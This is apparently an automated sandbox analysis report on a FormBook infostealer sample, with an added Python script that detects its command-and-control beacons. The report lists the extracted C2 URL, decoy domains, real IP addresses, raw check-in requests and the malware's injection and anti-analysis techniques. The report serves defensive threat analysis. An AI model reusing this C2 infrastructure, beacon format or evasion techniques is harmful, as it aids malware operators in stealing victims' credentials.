Analysis Report QUOTATION REQUEST.exe

Overview

General Information

Sample Name: QUOTATION REQUEST.exe
Analysis ID: 402973
MD5: 64af41000584694858d0fcc37b1bf69b
SHA1: 707c77c61fafdd736c1e02bfdbc8ce7ce24cc759
SHA256: fea7b692b71803eb020f04ec1a5f8118f5845910d9677fdb4636d9a7d209d0fa
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Found malware configuration
Source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.pedroiniesta.net/n7ad/"], "decoy": ["orchardevent.com", "inthebeginningshop.com", "keodm.com", "hangthejury.com", "cannabisllp.com", "letsratethis.com", "milanfashionperu.com", "adcvip.com", "professionalcprclasses.com", "checkmytradesmanswork.com", "sloanksmith.com", "apnajamshedpur.com", "665448.com", "zryld.com", "cabot.city", "graet.design", "furbabiesandflowers.com", "silkisensations.com", "sawubonastore.com", "screenwinz18.com", "freecleanlimpieza.com", "kthayerart.com", "domennyarendi12.net", "buffalobooze.com", "1066704.com", "godstrader.com", "wheyfordays.com", "liquidacion-express.com", "cinmax.xyz", "evamikko.com", "bestsellerselect.com", "fr-doms1.xyz", "publicoon.com", "sciencecopy.com", "buenosbison.icu", "senecadeer.com", "madisonroselove.com", "momanent.com", "colabchat.com", "oodledesigns.com", "dowershop.com", "shop-daily.info", "ivoyletdigital.com", "cqyuebing.net", "market-failure10.com", "lcpcap.com", "textmining.pro", "rodrigueslawgroup.com", "justwearshape.com", "famharmonie.com", "sublimationsuperstore.com", "xoyicgv.icu", "ejaysaffordablewebdesigns62.xyz", "sendanangelofhope.com", "ezglassandgifts.com", "stpl.world", "weddingmaskswv.com", "iprognos.com", "louanatummers.com", "businessboxitalia.network", "hk-duravit.com", "bbss2020.com", "tomojapanesetogo.com", "organicmatico.com"]}
Multi AV Scanner detection for submitted file
Source: QUOTATION REQUEST.exe Virustotal: Detection: 18%
Source: QUOTATION REQUEST.exe ReversingLabs: Detection: 34%
Yara detected FormBook
Source: Yara match File source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPE
Antivirus or Machine Learning detection for unpacked file
Source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files
Source: QUOTATION REQUEST.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: QUOTATION REQUEST.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wntdll.pdbUGP source: QUOTATION REQUEST.exe, 00000003.00000002.269387734.000000000180F000.00000040.00000001.sdmp, wlanext.exe, 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: QUOTATION REQUEST.exe, 00000003.00000002.269387734.000000000180F000.00000040.00000001.sdmp, wlanext.exe
Source: Binary string: wlanext.pdb source: QUOTATION REQUEST.exe, 00000003.00000002.269730717.0000000001A40000.00000040.00000001.sdmp
Source: Binary string: wlanext.pdbGCTL source: QUOTATION REQUEST.exe, 00000003.00000002.269730717.0000000001A40000.00000040.00000001.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 4x nop then pop ebx 3_2_00406AA3
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 4x nop then pop edi 3_2_0040C3C3
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 4x nop then pop ebx 9_2_00ED6AA3
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 4x nop then pop edi 9_2_00EDC3C3

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49746 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49746 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49746 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49748 -> 81.17.18.196:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49748 -> 81.17.18.196:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49748 -> 81.17.18.196:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49751 -> 206.189.50.215:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49751 -> 206.189.50.215:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49751 -> 206.189.50.215:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49752 -> 192.185.131.134:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49752 -> 192.185.131.134:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49752 -> 192.185.131.134:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49754 -> 46.30.211.38:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49754 -> 46.30.211.38:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49754 -> 46.30.211.38:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.pedroiniesta.net/n7ad/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /n7ad/?bl=Eq/FwtusPiugr/rOaWravHpFP32Pbco6wnD+p0CDgWeo4mVef5wl6f/Ws9GFZd9hVlol&uTgL=M6Al HTTP/1.1; Host: www.sloanksmith.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii: (seven null bytes, nothing printable)
Source: global traffic HTTP traffic detected: GET /n7ad/?bl=1rASbdTsLtsxQtx7SVeMPm6+5xONVyhrdB7mHEgQEcexIDozAv+yH2W2ARkxKFvsjoxU&uTgL=M6Al HTTP/1.1; Host: www.letsratethis.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii: (seven null bytes, nothing printable)
Source: global traffic HTTP traffic detected: GET /n7ad/?bl=Nvf62Ubmifj7PfGA1A/q0uZrlG7ppTSV9dUQibuGvO9bggeeu0voIlbclGtGRlSBmBIt&uTgL=M6Al HTTP/1.1; Host: www.cannabisllp.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii: (seven null bytes, nothing printable)
Source: global traffic HTTP traffic detected: GET /n7ad/?bl=3Beq3lgI6UHTLP/Ph9xH30PGCdCNNtH+lu9vUppUW1NTSJAeHuoOIBtndyRiz3KwYif9&uTgL=M6Al HTTP/1.1; Host: www.buffalobooze.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii: (seven null bytes, nothing printable)
Source: global traffic HTTP traffic detected: GET /n7ad/?bl=Puv/nYz2ehHi82u6CLpica4tA5y7A2oAoTVRqDemxJRG3nb9hDTrPyPUdUehoaPW3KLQ&uTgL=M6Al HTTP/1.1; Host: www.checkmytradesmanswork.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii: (seven null bytes, nothing printable)
Source: global traffic HTTP traffic detected: GET /n7ad/?bl=0nOrGG/dP8nX9ss6J8VJCOtskRWUcCjTb/L7IGsTqq8ZAGYUgptJ/YsQJEIM2Q4SHR3g&uTgL=M6Al HTTP/1.1; Host: www.inthebeginningshop.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii: (seven null bytes, nothing printable)
Source: global traffic HTTP traffic detected: GET /n7ad/?bl=qa2xgx7e5WCBLzYnkogL20jLY4d2MJB4UugdV3pZH4CGnIGrQzpXbQB2X2xqi6qVP90G&uTgL=M6Al HTTP/1.1; Host: www.madisonroselove.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii: (seven null bytes, nothing printable)
Source: global traffic HTTP traffic detected: GET /n7ad/?bl=Qaff1jmf/WOjI2zVxXueSV7DqvqvSgTESbm8GMviNW1Wc3TSdSF2c0Ut34b2CH/EdSK4&uTgL=M6Al HTTP/1.1; Host: www.pedroiniesta.net; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii: (seven null bytes, nothing printable)
Source: global traffic HTTP traffic detected: GET /n7ad/?bl=m2HasfwKJqOnivj33UsuzcdiGSf95h/71RH21qYEgR61Ll0cP2jFCaQDWCmKDc63e7Zh&uTgL=M6Al HTTP/1.1; Host: www.freecleanlimpieza.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii: (seven null bytes, nothing printable)
Source: global traffic HTTP traffic detected: GET /n7ad/?bl=2U/v4DZudtCtKNEpNcyI8CRPeodRf0IJyZopOKgcJ9ZvO/nIRtlTdWl2MHOFm/qEgPrh&uTgL=M6Al HTTP/1.1; Host: www.graet.design; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii: (seven null bytes, nothing printable)
Source: global traffic HTTP traffic detected: GET /n7ad/?bl=Eq/FwtusPiugr/rOaWravHpFP32Pbco6wnD+p0CDgWeo4mVef5wl6f/Ws9GFZd9hVlol&uTgL=M6Al HTTP/1.1; Host: www.sloanksmith.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii: (seven null bytes, nothing printable)
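The requests above share one URI path (/n7ad/), one variable blob parameter (bl=) and one fixed trailing pair (uTgL=M6Al), while the Host header rotates through the decoy domains from the extracted configuration; only one of those hosts, www.pedroiniesta.net, is the configured C2. This is the shape the ET FormBook check-in rules key on. As an added example that is not part of the Joe Sandbox report, the Python below clusters request lines by that shape and then separates the configured C2 from the decoys using the C2 list printed by the configuration extractor. The request list is constructed from five of the entries above plus two invented benign requests; the base64-alphabet blob test and the minimum-host threshold are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed input: (Host header, request-target, User-Agent or None).
# The first five entries are copied from the HTTP traffic listed in this report
# (none of them carried a User-Agent); the last two are invented benign requests.
SAMPLE_REQUESTS = [
    ("www.sloanksmith.com",
     "/n7ad/?bl=Eq/FwtusPiugr/rOaWravHpFP32Pbco6wnD+p0CDgWeo4mVef5wl6f/Ws9GFZd9hVlol&uTgL=M6Al", None),
    ("www.letsratethis.com",
     "/n7ad/?bl=1rASbdTsLtsxQtx7SVeMPm6+5xONVyhrdB7mHEgQEcexIDozAv+yH2W2ARkxKFvsjoxU&uTgL=M6Al", None),
    ("www.cannabisllp.com",
     "/n7ad/?bl=Nvf62Ubmifj7PfGA1A/q0uZrlG7ppTSV9dUQibuGvO9bggeeu0voIlbclGtGRlSBmBIt&uTgL=M6Al", None),
    ("www.pedroiniesta.net",
     "/n7ad/?bl=Qaff1jmf/WOjI2zVxXueSV7DqvqvSgTESbm8GMviNW1Wc3TSdSF2c0Ut34b2CH/EdSK4&uTgL=M6Al", None),
    ("www.graet.design",
     "/n7ad/?bl=2U/v4DZudtCtKNEpNcyI8CRPeodRf0IJyZopOKgcJ9ZvO/nIRtlTdWl2MHOFm/qEgPrh&uTgL=M6Al", None),
    ("www.example.com", "/index.html", "Mozilla/5.0"),              # constructed, benign
    ("cdn.example.net", "/static/app.js?v=4.5.0", "Mozilla/5.0"),   # constructed, benign
]

# C2 URL exactly as printed by the configuration extractor earlier in this report.
CONFIG_C2_URLS = ["www.pedroiniesta.net/n7ad/"]

# Base64 alphabet, at least 32 characters: the shape of the encrypted check-in blob
# (assumed threshold).
BLOB_RE = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")


def parse_query(query):
    """Split a query string into (name, value) pairs without percent- or
    plus-decoding: the blob uses '+' and '/' literally, and parse_qsl would
    turn every '+' into a space."""
    pairs = []
    for part in query.split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs.append((name, value))
    return pairs


def find_beacon_clusters(requests, min_hosts=3):
    """Group requests by (path, blob parameter name, fixed trailing pair,
    User-Agent absent) and return the groups seen against >= min_hosts hosts."""
    clusters = defaultdict(set)
    for host, target, user_agent in requests:
        parts = urlsplit(target)
        params = parse_query(parts.query)
        if len(params) < 2:
            continue
        (blob_name, blob), (fixed_name, fixed_value) = params[0], params[-1]
        if not BLOB_RE.fullmatch(blob):
            continue
        key = (parts.path, blob_name, f"{fixed_name}={fixed_value}", user_agent is None)
        clusters[key].add(host)
    return [
        {"path": path, "blob_param": blob_name, "fixed_query": fixed,
         "no_user_agent": no_ua, "hosts": sorted(hosts)}
        for (path, blob_name, fixed, no_ua), hosts in clusters.items()
        if len(hosts) >= min_hosts
    ]


def split_real_and_decoy(cluster, c2_urls):
    """Split a cluster's hosts into (configured C2 hosts, decoy hosts) using
    the 'host/path/' URLs from the extracted configuration."""
    c2_hosts = set()
    for url in c2_urls:
        host, _, rest = url.partition("/")
        if "/" + rest == cluster["path"]:
            c2_hosts.add(host)
    real = sorted(h for h in cluster["hosts"] if h in c2_hosts)
    decoys = sorted(h for h in cluster["hosts"] if h not in c2_hosts)
    return real, decoys


if __name__ == "__main__":
    for cluster in find_beacon_clusters(SAMPLE_REQUESTS):
        real, decoys = split_real_and_decoy(cluster, CONFIG_C2_URLS)
        print(f"{cluster['path']} {cluster['fixed_query']}: c2={real} decoys={decoys}")
```

Clustering on the fixed trailing pair rather than on the host is what makes this robust to the decoy rotation: every decoy domain is legitimate and would look benign on its own, and only the one-path-many-hosts pattern (with no User-Agent) gives the beacon away. Without the extracted configuration the cluster alone cannot say which host is the real C2; that is why the config extractor output above matters for blocking.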
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 46.30.211.38
Source: Joe Sandbox View IP Address: 81.17.18.196
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DIGITALOCEAN-ASN (US)
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1 (US)
Source: Joe Sandbox View ASN Name: ONEANDONE-AS Brauerstrasse 48 (DE)
Source: unknown DNS traffic detected: queries for: www.sloanksmith.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Content-Type: text/html; Content-Length: 1364; Connection: close; Date: Mon, 03 May 2021 14:51:02 GMT; Server: Apache; X-Frame-Options: deny
Data (ASCII decoded from the Data Raw hex dump; the dump is truncated in the report):
<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8">
        <style type="text/css">
            html, body, #partner, iframe {
                height:100%;
                width:100%;
                margin:0;
                padding:0;
                border:0;
                outline:0;
                font-size:100%;
                vertical-align:baseline;
                background:transparent;
            }
            body {
                overflow:hidden;
            }
        </style>
        <meta content="NOW" name="expires">
        <meta content="index, follow, all" name="GOOGLEBOT">
        <meta content="index, follow, all" name="robots">
        <!-- Following Meta-Tag fixes scaling-issues on mobile devices -->
        <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport">
    </head>
    <body>
        <div id="partner"></div>
        <script ty (dump ends here)
Source: explorer.exe, 00000005.00000000.253105057.00000000089FF000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: QUOTATION REQUEST.exe, 00000000.00000002.228172147.0000000002631000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: QUOTATION REQUEST.exe String found in binary or memory: https://github.com/unguest
Source: QUOTATION REQUEST.exe String found in binary or memory: https://github.com/unguest9WinForms_RecursiveFormCreate5WinForms_SeeInnerExceptionGProperty
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: wlanext.exe, 00000009.00000002.485777582.0000000003D12000.00000004.00000001.sdmp String found in binary or memory: https://www.freecleanlimpieza.com/n7ad/?bl=m2HasfwKJqOnivj33UsuzcdiGSf95h/71RH21qYEgR61Ll0cP2jFCaQDW

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: QUOTATION REQUEST.exe
Contains functionality to call native functions
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 3_2_004181C0 NtCreateFile, 3_2_004181C0
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 3_2_00418270 NtReadFile, 3_2_00418270
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 3_2_004182F0 NtClose, 3_2_004182F0
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 3_2_004183A0 NtAllocateVirtualMemory, 3_2_004183A0
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 3_2_004182EF NtClose, 3_2_004182EF
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 3_2_004182BA NtReadFile, 3_2_004182BA
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 3_2_0041839F NtAllocateVirtualMemory, 3_2_0041839F
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03639A50 NtCreateFile,LdrInitializeThunk, 9_2_03639A50
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03639910 NtAdjustPrivilegesToken,LdrInitializeThunk, 9_2_03639910
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036399A0 NtCreateSection,LdrInitializeThunk, 9_2_036399A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03639860 NtQuerySystemInformation,LdrInitializeThunk, 9_2_03639860
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03639840 NtDelayExecution,LdrInitializeThunk, 9_2_03639840
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03639710 NtQueryInformationToken,LdrInitializeThunk, 9_2_03639710
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03639FE0 NtCreateMutant,LdrInitializeThunk, 9_2_03639FE0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03639780 NtMapViewOfSection,LdrInitializeThunk, 9_2_03639780
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03639660 NtAllocateVirtualMemory,LdrInitializeThunk, 9_2_03639660
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03639650 NtQueryValueKey,LdrInitializeThunk, 9_2_03639650
